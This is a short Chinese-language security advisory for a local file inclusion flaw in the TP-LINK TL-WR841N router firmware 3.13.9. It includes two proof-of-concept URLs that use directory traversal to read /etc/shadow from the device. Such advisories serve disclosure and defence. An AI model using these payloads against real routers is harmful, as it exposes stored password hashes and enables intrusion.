TP-LINK TL-WR841N路由器本地文件泄漏漏洞

受影响系统:
TP-LINK TL-WR841N 3.13.9
描述:
BUGTRAQ ID: 56320

TP-LINK TL-WR841N是无线路由器。

TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n及其他版本存在本地文件包含漏洞,攻击者可利用此漏洞在受影响设备中查询文件和执行本地脚本。

<*来源:Matan Azugi *>

测试方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/../../../../../../../etc/shadow
http://www.example.com/help/../../../../../../../../etc/shadow

建议:
厂商补丁:

TP-LINK
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.tp-link.com/products/

评论关闭。